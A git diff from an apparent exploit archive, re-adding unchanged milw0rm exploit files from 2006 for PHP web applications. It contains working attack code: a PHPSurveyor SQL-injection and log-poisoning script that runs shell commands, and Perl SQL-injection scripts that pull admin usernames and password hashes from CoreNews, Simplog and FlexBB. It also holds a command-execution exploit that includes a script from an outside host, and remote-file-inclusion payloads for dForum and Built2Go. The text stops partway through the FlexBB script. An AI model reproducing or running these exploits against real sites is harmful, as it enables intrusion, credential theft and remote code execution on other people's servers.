-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"../../../../../../logs/error.log",
-"../../../../../../logs/access.log",
-"../../../../../../../../../../etc/httpd/logs/acces_log",
-"../../../../../../../../../../etc/httpd/logs/acces.log",
-"../../../../../../../../../../etc/httpd/logs/error_log",
-"../../../../../../../../../../etc/httpd/logs/error.log",
-"../../../../../../../../../../var/www/logs/access_log",
-"../../../../../../../../../../var/www/logs/access.log",
-"../../../../../../../../../../usr/local/apache/logs/access_log",
-"../../../../../../../../../../usr/local/apache/logs/access.log",
-"../../../../../../../../../../var/log/apache/access_log",
-"../../../../../../../../../../var/log/apache/access.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/www/logs/error_log",
-"../../../../../../../../../../var/www/logs/error.log",
-"../../../../../../../../../../usr/local/apache/logs/error_log",
-"../../../../../../../../../../usr/local/apache/logs/error.log",
-"../../../../../../../../../../var/log/apache/error_log",
-"../../../../../../../../../../var/log/apache/error.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/log/error_log"
-);
-
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-$a=$i+2;
-
-//bypassing magic_quotes=On encoding paths with CHAR() MySQL func
-$mysql_encoded="CHAR(";
-  for ($j=0; $j<=strlen($paths[$i])-1; $j++)
-  {
-   $mysql_encoded.=ord($paths[$i][$j]);
-   if ($j==strlen($paths[$i])-1)
-   {$mysql_encoded.=",0)";} //a null char to break inclusion path, encoded as CHAR(0)
-   else
-   {$mysql_encoded.=",";}
-  }
-
-$SQL="999 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,".$mysql_encoded.",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM surveys";
-echo "[".$a."] Trying with -> - ".$SQL." - for \"surveyd\" argument\r\n\r\n";
-$SQL=urlencode($SQL);
-$packet ="GET ".$p."save.php HTTP/1.0\r\n";
-$packet.="User-Agent: GoogleBot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: surveyid=$SQL; cmd=".$cmd.";\r\n"; //let's poison the thissurvey['language'] value, thorugh cookies, log this :)
-$packet.="Connection: Close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"56789"))
-    {
-     echo "Exploit succeeded...\r\n";
-     $temp=explode("56789",$html);
-     die($temp[1]);
-    }
-}
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-04-20]
+#!/usr/bin/php -q -d short_open_tag=on
+ works regardless of magic_quotes gpc settings                 *\r\n";
+echo "*    with at least one row in 'surveys' table                      *\r\n";
+echo "*    and if we succeed to include logs                             *\r\n";
+echo "********************************************************************\r\n";
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to PHPSurveyor\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /surveyor/ cat config.php\r\n";
+echo "php ".$argv[0]." localhost /surveyor/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
+die;
+}
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "[1] Injecting some code in log files ...\r\n\r\n";
+$CODE="";
+$packet="GET ".$p.$CODE." HTTP/1.0\r\n";
+$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: close\r\n\r\n";
+sendpacketii($packet);
+sleep(3);
+
+//fill with possible locations...
+$paths=array(
+"../../../../../../../../../../var/log/httpd/access_log",
+"../../../../../../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../../../../../../apache/logs/error.log",
+"../../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"../../../../../../logs/error.log",
+"../../../../../../logs/access.log",
+"../../../../../../../../../../etc/httpd/logs/acces_log",
+"../../../../../../../../../../etc/httpd/logs/acces.log",
+"../../../../../../../../../../etc/httpd/logs/error_log",
+"../../../../../../../../../../etc/httpd/logs/error.log",
+"../../../../../../../../../../var/www/logs/access_log",
+"../../../../../../../../../../var/www/logs/access.log",
+"../../../../../../../../../../usr/local/apache/logs/access_log",
+"../../../../../../../../../../usr/local/apache/logs/access.log",
+"../../../../../../../../../../var/log/apache/access_log",
+"../../../../../../../../../../var/log/apache/access.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/www/logs/error_log",
+"../../../../../../../../../../var/www/logs/error.log",
+"../../../../../../../../../../usr/local/apache/logs/error_log",
+"../../../../../../../../../../usr/local/apache/logs/error.log",
+"../../../../../../../../../../var/log/apache/error_log",
+"../../../../../../../../../../var/log/apache/error.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/log/error_log"
+);
+
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+$a=$i+2;
+
+//bypassing magic_quotes=On encoding paths with CHAR() MySQL func
+$mysql_encoded="CHAR(";
+  for ($j=0; $j<=strlen($paths[$i])-1; $j++)
+  {
+   $mysql_encoded.=ord($paths[$i][$j]);
+   if ($j==strlen($paths[$i])-1)
+   {$mysql_encoded.=",0)";} //a null char to break inclusion path, encoded as CHAR(0)
+   else
+   {$mysql_encoded.=",";}
+  }
+
+$SQL="999 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,".$mysql_encoded.",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM surveys";
+echo "[".$a."] Trying with -> - ".$SQL." - for \"surveyd\" argument\r\n\r\n";
+$SQL=urlencode($SQL);
+$packet ="GET ".$p."save.php HTTP/1.0\r\n";
+$packet.="User-Agent: GoogleBot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: surveyid=$SQL; cmd=".$cmd.";\r\n"; //let's poison the thissurvey['language'] value, thorugh cookies, log this :)
+$packet.="Connection: Close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"56789"))
+    {
+     echo "Exploit succeeded...\r\n";
+     $temp=explode("56789",$html);
+     die($temp[1]);
+    }
+}
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-04-20]
diff --git a/platforms/php/webapps/1704.pl b/platforms/php/webapps/1704.pl
index 7c6d621cf..e137a441d 100755
--- a/platforms/php/webapps/1704.pl
+++ b/platforms/php/webapps/1704.pl
@@ -1,62 +1,62 @@
-#!/usr/bin/perl
-#Method found & Exploit scripted by nukedx
-#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
-#Original advisory: http://www.nukedx.com/?viewdoc=24
-#Usage: corenews.pl  
-use IO::Socket;
-if(@ARGV != 2) { usage(); }
-else { exploit(); }
-sub header()
-{
-  print "\n- NukedX Security Advisory Nr.2006-24\r\n";
-  print "- CoreNews <= 2.0.1 Remote SQL Injection Exploit\r\n";
-}
-sub usage() 
-{
-  header();
-  print "- Usage: $0  \r\n";
-  print "-  -> Victim's host ex: www.victim.com\r\n";
-  print "-  -> Path to CoreNews ex: /corenews/\r\n";
-  exit();
-}
-sub exploit () 
-{
-  #Our variables...
-  $cnserver = $ARGV[0];
-  $cnserver =~ s/(http:\/\/)//eg;
-  $cnhost   = "http://".$cnserver;
-  $cndir    = $ARGV[1];
-  $cnport   = "80";
-  $cntar    = "preview.php?userid=";
-  $cnxp     = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*";
-  $cnreq    = $cnhost.$cndir.$cntar.$cnxp;
-  #Sending data...
-  header();
-  print "- Trying to connect: $cnserver\r\n";
-  $cn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "- Connection failed...\n";
-  print $cn "GET $cnreq HTTP/1.1\n";
-  print $cn "Accept: */*\n";
-  print $cn "Referer: $cnhost\n";
-  print $cn "Accept-Language: tr\n";
-  print $cn "User-Agent: NukeZilla\n";
-  print $cn "Cache-Control: no-cache\n";
-  print $cn "Host: $cnserver\n";
-  print $cn "Connection: close\n\n";
-  print "- Connected...\r\n";
-  while ($answer = <$cn>) {
-    if ($answer =~ /2022(.*?)20223([\d,a-f]{32})2203/) {
-      print "- Exploit succeed!\r\n";
-      print "- Username: $1\r\n";
-      print "- MD5 HASH of PASSWORD: $2\r\n";
-      print "- If you crack hash you can use RFI with example ->\r\n";
-      print "- Example: $cnhost$cndir?show=http://yourhost.com/file.txt\r\n"; 
-      exit();
-    }
-  }
-  #Exploit failed...
-  print "- Exploit failed\n"
-}
-
-# nukedx.com [2006-04-21]
-
-# milw0rm.com [2006-04-21]
+#!/usr/bin/perl
+#Method found & Exploit scripted by nukedx
+#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
+#Original advisory: http://www.nukedx.com/?viewdoc=24
+#Usage: corenews.pl  
+use IO::Socket;
+if(@ARGV != 2) { usage(); }
+else { exploit(); }
+sub header()
+{
+  print "\n- NukedX Security Advisory Nr.2006-24\r\n";
+  print "- CoreNews <= 2.0.1 Remote SQL Injection Exploit\r\n";
+}
+sub usage() 
+{
+  header();
+  print "- Usage: $0  \r\n";
+  print "-  -> Victim's host ex: www.victim.com\r\n";
+  print "-  -> Path to CoreNews ex: /corenews/\r\n";
+  exit();
+}
+sub exploit () 
+{
+  #Our variables...
+  $cnserver = $ARGV[0];
+  $cnserver =~ s/(http:\/\/)//eg;
+  $cnhost   = "http://".$cnserver;
+  $cndir    = $ARGV[1];
+  $cnport   = "80";
+  $cntar    = "preview.php?userid=";
+  $cnxp     = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*";
+  $cnreq    = $cnhost.$cndir.$cntar.$cnxp;
+  #Sending data...
+  header();
+  print "- Trying to connect: $cnserver\r\n";
+  $cn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "- Connection failed...\n";
+  print $cn "GET $cnreq HTTP/1.1\n";
+  print $cn "Accept: */*\n";
+  print $cn "Referer: $cnhost\n";
+  print $cn "Accept-Language: tr\n";
+  print $cn "User-Agent: NukeZilla\n";
+  print $cn "Cache-Control: no-cache\n";
+  print $cn "Host: $cnserver\n";
+  print $cn "Connection: close\n\n";
+  print "- Connected...\r\n";
+  while ($answer = <$cn>) {
+    if ($answer =~ /2022(.*?)20223([\d,a-f]{32})2203/) {
+      print "- Exploit succeed!\r\n";
+      print "- Username: $1\r\n";
+      print "- MD5 HASH of PASSWORD: $2\r\n";
+      print "- If you crack hash you can use RFI with example ->\r\n";
+      print "- Example: $cnhost$cndir?show=http://yourhost.com/file.txt\r\n"; 
+      exit();
+    }
+  }
+  #Exploit failed...
+  print "- Exploit failed\n"
+}
+
+# nukedx.com [2006-04-21]
+
+# milw0rm.com [2006-04-21]
diff --git a/platforms/php/webapps/1705.pl b/platforms/php/webapps/1705.pl
index 5694d189b..9f0b408f2 100755
--- a/platforms/php/webapps/1705.pl
+++ b/platforms/php/webapps/1705.pl
@@ -1,60 +1,60 @@
-#!/usr/bin/perl
-#Method found & Exploit scripted by nukedx
-#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
-#Original advisory: http://www.nukedx.com/?viewdoc=25
-#Usage: simplog.pl  
-use IO::Socket;
-if(@ARGV != 2) { usage(); }
-else { exploit(); }
-sub header()
-{
-  print "\n- NukedX Security Advisory Nr.2006-25\r\n";
-  print "- Simplog <= 0.93 Remote SQL Injection Exploit\r\n";
-}
-sub usage() 
-{
-  header();
-  print "- Usage: $0  \r\n";
-  print "-  -> Victim's host ex: www.victim.com\r\n";
-  print "-  -> Path to Simplog ex: /simplog/\r\n";
-  exit();
-}
-sub exploit () 
-{
-  #Our variables...
-  $spserver = $ARGV[0];
-  $spserver =~ s/(http:\/\/)//eg;
-  $sphost   = "http://".$spserver;
-  $spdir    = $ARGV[1];
-  $spport   = "80";
-  $sptar    = "preview.php?adm=tem&blogid=1&tid=";
-  $spxp     = "-1/**/UNION/**/SELECT/**/concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/**/admin=1/*";
-  $spreq    = $sphost.$spdir.$sptar.$spxp;
-  #Sending data...
-  header();
-  print "- Trying to connect: $spserver\r\n";
-  $sp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$spserver", PeerPort => "$spport") || die "- Connection failed...\n";
-  print $sp "GET $spreq HTTP/1.1\n";
-  print $sp "Accept: */*\n";
-  print $sp "Referer: $sphost\n";
-  print $sp "Accept-Language: tr\n";
-  print $sp "User-Agent: NukeZilla\n";
-  print $sp "Cache-Control: no-cache\n";
-  print $sp "Host: $spserver\n";
-  print $sp "Connection: close\n\n";
-  print "- Connected...\r\n";
-  while ($answer = <$sp>) {
-    if ($answer =~ /25552(.*?)25553([\d,a-f]{32})25554/) {
-      print "- Exploit succeed!\r\n";
-      print "- Username: $1\r\n";
-      print "- MD5 HASH of PASSWORD: $2\r\n";
-      exit();
-    }
-  }
-  #Exploit failed...
-  print "- Exploit failed\n"
-}
-
-# nukedx.com [2006-04-21]
-
-# milw0rm.com [2006-04-21]
+#!/usr/bin/perl
+#Method found & Exploit scripted by nukedx
+#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
+#Original advisory: http://www.nukedx.com/?viewdoc=25
+#Usage: simplog.pl  
+use IO::Socket;
+if(@ARGV != 2) { usage(); }
+else { exploit(); }
+sub header()
+{
+  print "\n- NukedX Security Advisory Nr.2006-25\r\n";
+  print "- Simplog <= 0.93 Remote SQL Injection Exploit\r\n";
+}
+sub usage() 
+{
+  header();
+  print "- Usage: $0  \r\n";
+  print "-  -> Victim's host ex: www.victim.com\r\n";
+  print "-  -> Path to Simplog ex: /simplog/\r\n";
+  exit();
+}
+sub exploit () 
+{
+  #Our variables...
+  $spserver = $ARGV[0];
+  $spserver =~ s/(http:\/\/)//eg;
+  $sphost   = "http://".$spserver;
+  $spdir    = $ARGV[1];
+  $spport   = "80";
+  $sptar    = "preview.php?adm=tem&blogid=1&tid=";
+  $spxp     = "-1/**/UNION/**/SELECT/**/concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/**/admin=1/*";
+  $spreq    = $sphost.$spdir.$sptar.$spxp;
+  #Sending data...
+  header();
+  print "- Trying to connect: $spserver\r\n";
+  $sp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$spserver", PeerPort => "$spport") || die "- Connection failed...\n";
+  print $sp "GET $spreq HTTP/1.1\n";
+  print $sp "Accept: */*\n";
+  print $sp "Referer: $sphost\n";
+  print $sp "Accept-Language: tr\n";
+  print $sp "User-Agent: NukeZilla\n";
+  print $sp "Cache-Control: no-cache\n";
+  print $sp "Host: $spserver\n";
+  print $sp "Connection: close\n\n";
+  print "- Connected...\r\n";
+  while ($answer = <$sp>) {
+    if ($answer =~ /25552(.*?)25553([\d,a-f]{32})25554/) {
+      print "- Exploit succeed!\r\n";
+      print "- Username: $1\r\n";
+      print "- MD5 HASH of PASSWORD: $2\r\n";
+      exit();
+    }
+  }
+  #Exploit failed...
+  print "- Exploit failed\n"
+}
+
+# nukedx.com [2006-04-21]
+
+# milw0rm.com [2006-04-21]
diff --git a/platforms/php/webapps/1706.txt b/platforms/php/webapps/1706.txt
index f32b8d138..96e460590 100755
--- a/platforms/php/webapps/1706.txt
+++ b/platforms/php/webapps/1706.txt
@@ -1,33 +1,33 @@
-dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
-Method found by nukedx,
-Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
-This exploit works on dForum <= 1.5
-http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
-Files ->
-about.php
-admin.php
-anmelden.php
-closethread.php
-config.php
-delpost.php
-delthread.php
-dfcode.php
-download.php
-editanoc.php
-forum.php
-login.php
-makethread.php
-menu.php
-newthread.php
-openthread.php
-overview.php
-post.php
-suchen.php
-user.php
-userconfig.php
-userinfo.php
-verwalten.php
-Original advisory: http://www.nukedx.com/?viewdoc=27
-# nukedx.com [2006-04-21]
-
-# milw0rm.com [2006-04-21]
+dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
+Method found by nukedx,
+Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
+This exploit works on dForum <= 1.5
+http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
+Files ->
+about.php
+admin.php
+anmelden.php
+closethread.php
+config.php
+delpost.php
+delthread.php
+dfcode.php
+download.php
+editanoc.php
+forum.php
+login.php
+makethread.php
+menu.php
+newthread.php
+openthread.php
+overview.php
+post.php
+suchen.php
+user.php
+userconfig.php
+userinfo.php
+verwalten.php
+Original advisory: http://www.nukedx.com/?viewdoc=27
+# nukedx.com [2006-04-21]
+
+# milw0rm.com [2006-04-21]
diff --git a/platforms/php/webapps/1707.pl b/platforms/php/webapps/1707.pl
index 3282f46c1..ed13d6634 100755
--- a/platforms/php/webapps/1707.pl
+++ b/platforms/php/webapps/1707.pl
@@ -1,69 +1,69 @@
-#!/usr/bin/perl
-#Method found & Exploit scripted by nukedx
-#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
-#Original advisory: http://www.nukedx.com/?viewdoc=28
-#Usage: ladder.pl   
-#Dork: "Ladder Scripts by http://www.mygamingladder.com" 40.500 pages.
-use IO::Socket;
-if(@ARGV < 3) { usage(); }
-else { exploit(); }
-sub header()
-{
-  print "\n- NukedX Security Advisory Nr.2006-28\r\n";
-  print "- My Gaming Ladder Combo System <= 7.0 Remote Command Execution Exploit\r\n";
-}
-sub main::urlEncode {
-  my ($string) = @_;
-  $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
-  #$string# =~ tr/.//;
-  return $string;
-}
-sub usage() 
-{
-  header();
-  print "- Usage: $0   \r\n";
-  print "-  -> Victim's host ex: www.victim.com\r\n";
-  print "-  -> Path to My Gaming Ladder ex: /ladder/\r\n";
-  print "-   -> Command to execute ex: ls -la\r\n";
-  print "- This exploit needs allow_url_fopen set to 1 and register_globals on\r\n";
-  exit();
-}
-sub exploit () 
-{
-  #Our variables...
-  $echoing  = "";
-  $ldserver = $ARGV[0];
-  $ldserver =~ s/(http:\/\/)//eg;
-  $ldhost   = "http://".$ldserver;
-  $lddir    = $ARGV[1];
-  $ldport   = "80";
-  $ldtar    = "stats.php?dir[func]=&dir[base]=http://www.misssera.com.tr/old/rce.txt%3F&command=";
-  $ldcmd    = ""; for ($i=2; $i<=$#ARGV; $i++) {$ldcmd.="%20".urlEncode($ARGV[$i]);};
-  $ldreq    = $ldhost.$lddir.$ldtar.$ldcmd;
-  #Sending data...
-  header();
-  print "- Trying to connect: $ldserver\r\n";
-  $ld = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ldserver", PeerPort => "$ldport") || die "- Connection failed...\n";
-  print $ld "GET $ldreq HTTP/1.1\n";
-  print $ld "Accept: */*\n";
-  print $ld "Referer: $ldhost\n";
-  print $ld "Accept-Language: tr\n";
-  print $ld "User-Agent: NukeZilla\n";
-  print $ld "Cache-Control: no-cache\n";
-  print $ld "Host: $ldserver\n";
-  print $ld "Connection: close\n\n";
-  print "- Connected...\r\n";
-  $echoing = "No";
-  while ($answer = <$ld>) {
-    if ($answer =~ /NukedX here/) { $echoing = "Yes"; }
-    if ($answer =~ /NukedX was here/) { print "- End of results\n"; exit(); }
-    if ($echoing =~ /Yes/) { 
-      if ($answer =~ /NukedX here/) { print "- Command executed succesfully here is results\r\n"; }
-      else { print "$answer"; }
-    }
-  }
-  #Exploit failed...
-  print "- Exploit failed\n"
-}
-
-# milw0rm.com [2006-04-22]
+#!/usr/bin/perl
+#Method found & Exploit scripted by nukedx
+#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
+#Original advisory: http://www.nukedx.com/?viewdoc=28
+#Usage: ladder.pl   
+#Dork: "Ladder Scripts by http://www.mygamingladder.com" 40.500 pages.
+use IO::Socket;
+if(@ARGV < 3) { usage(); }
+else { exploit(); }
+sub header()
+{
+  print "\n- NukedX Security Advisory Nr.2006-28\r\n";
+  print "- My Gaming Ladder Combo System <= 7.0 Remote Command Execution Exploit\r\n";
+}
+sub main::urlEncode {
+  my ($string) = @_;
+  $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
+  #$string# =~ tr/.//;
+  return $string;
+}
+sub usage() 
+{
+  header();
+  print "- Usage: $0   \r\n";
+  print "-  -> Victim's host ex: www.victim.com\r\n";
+  print "-  -> Path to My Gaming Ladder ex: /ladder/\r\n";
+  print "-   -> Command to execute ex: ls -la\r\n";
+  print "- This exploit needs allow_url_fopen set to 1 and register_globals on\r\n";
+  exit();
+}
+sub exploit () 
+{
+  #Our variables...
+  $echoing  = "";
+  $ldserver = $ARGV[0];
+  $ldserver =~ s/(http:\/\/)//eg;
+  $ldhost   = "http://".$ldserver;
+  $lddir    = $ARGV[1];
+  $ldport   = "80";
+  $ldtar    = "stats.php?dir[func]=&dir[base]=http://www.misssera.com.tr/old/rce.txt%3F&command=";
+  $ldcmd    = ""; for ($i=2; $i<=$#ARGV; $i++) {$ldcmd.="%20".urlEncode($ARGV[$i]);};
+  $ldreq    = $ldhost.$lddir.$ldtar.$ldcmd;
+  #Sending data...
+  header();
+  print "- Trying to connect: $ldserver\r\n";
+  $ld = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ldserver", PeerPort => "$ldport") || die "- Connection failed...\n";
+  print $ld "GET $ldreq HTTP/1.1\n";
+  print $ld "Accept: */*\n";
+  print $ld "Referer: $ldhost\n";
+  print $ld "Accept-Language: tr\n";
+  print $ld "User-Agent: NukeZilla\n";
+  print $ld "Cache-Control: no-cache\n";
+  print $ld "Host: $ldserver\n";
+  print $ld "Connection: close\n\n";
+  print "- Connected...\r\n";
+  $echoing = "No";
+  while ($answer = <$ld>) {
+    if ($answer =~ /NukedX here/) { $echoing = "Yes"; }
+    if ($answer =~ /NukedX was here/) { print "- End of results\n"; exit(); }
+    if ($echoing =~ /Yes/) { 
+      if ($answer =~ /NukedX here/) { print "- Command executed succesfully here is results\r\n"; }
+      else { print "$answer"; }
+    }
+  }
+  #Exploit failed...
+  print "- Exploit failed\n"
+}
+
+# milw0rm.com [2006-04-22]
diff --git a/platforms/php/webapps/1711.txt b/platforms/php/webapps/1711.txt
index 7926125e7..07a94feee 100755
--- a/platforms/php/webapps/1711.txt
+++ b/platforms/php/webapps/1711.txt
@@ -1,11 +1,11 @@
-Built2Go PHP Movie Review <=2B Remote File Inclusion Vulnerability
-
-in movie_cls.php
-
-# require_once("$full_path/review_cls.php");
-
-usage:
-
-# http://www.site.com/[path]/movie_cls.php?full_path=http://www.site.com/x.txt?&cmd=uname -a
-
-# milw0rm.com [2006-04-23]
+Built2Go PHP Movie Review <=2B Remote File Inclusion Vulnerability
+
+in movie_cls.php
+
+# require_once("$full_path/review_cls.php");
+
+usage:
+
+# http://www.site.com/[path]/movie_cls.php?full_path=http://www.site.com/x.txt?&cmd=uname -a
+
+# milw0rm.com [2006-04-23]
diff --git a/platforms/php/webapps/1713.pl b/platforms/php/webapps/1713.pl
index 6b67b6d32..c94553f0a 100755
--- a/platforms/php/webapps/1713.pl
+++ b/platforms/php/webapps/1713.pl
@@ -1,57 +1,57 @@
-#!/usr/bin/perl
-use IO::Socket;
-#FlexBB Exploit [ function/showprofile.php ] Remote SQL Injection
-#
-#        1- First Do Login
-#        2- View This Link :D
-#
-#        index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbb_users WHERE id=1/*
-#
-#-----------------------------------------------#
-#
-#--[ D3vil-0x1 | Devil-00 ]--#
-#
-# SecurityGurus.net
-#               Div The PHP Security Fucking Tool :D
-
-##-- Start --#
-
-$host         = "127.0.0.1";
-$path         = "/flexbb/";
-$injec        = "-1'%20UNION%20ALL%20SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8%20FROM%20flexbb_users%20WHERE%20id=1/*";
-
-##-- _END_ --##
-#        $host                :-
-#                                The Host Name Without http:// | exm. www.vic.com
-#
-#        $path                :-
-#                                FlexBB Dir On Server | exm. /flexbb/
-#
-#        $mycookie             :-
-#                                Your Login Info To Forum *  Not The Real Password || The Hashed One *
-
-
-$sock = IO::Socket::INET->new (
-                                                                                PeerAddr => "$host",
-                                                                                PeerPort => "80",
-                                                                                Proto    => "tcp"
-                                                                                ) or die("[!] Connect To Server Was Filed");
-
-##-- DONT TRY TO EDIT ME --##
-$evildata  = "GET ".$path."index.php?page=showprofile&id=".$injec." HTTP/1.1\n";
-$evildata .= "Host: $host \n";
-$evildata .= "Accept: */* \n";
-$evildata .= "Keep-Alive: 300\n";
-$evildata .= "Connection: keep-alive \n\n";
-
-print $sock $evildata;
-
-while($ans = <$sock>){
-       $usr_newans = $ans;
-       $pwd_newans = $ans;
-       #print $newans;
-       $usr_newans =~ m/FlexBB - Viewing Profile: (.*?)<\/title>/ && print "[+] Username is :- ".$1."\n";
-       $pwd_newans =~ m/<a href="2" target="_blank">(.*?)<\/a>/ && print "[+] Password is :- ".$1."\n";
-}
-
-# milw0rm.com [2006-04-24]
+#!/usr/bin/perl
+use IO::Socket;
+#FlexBB Exploit [ function/showprofile.php ] Remote SQL Injection
+#
+#        1- First Do Login
+#        2- View This Link :D
+#
+#        index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbb_users WHERE id=1/*
+#
+#-----------------------------------------------#
+#
+#--[ D3vil-0x1 | Devil-00 ]--#
+#
+# SecurityGurus.net
+#               Div The PHP Security Fucking Tool :D
+
+##-- Start --#
+
+$host         = "127.0.0.1";
+$path         = "/flexbb/";
+$injec        = "-1'%20UNION%20ALL%20SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8%20FROM%20flexbb_users%20WHERE%20id=1/*";
+
+##-- _END_ --##
+#        $host                :-
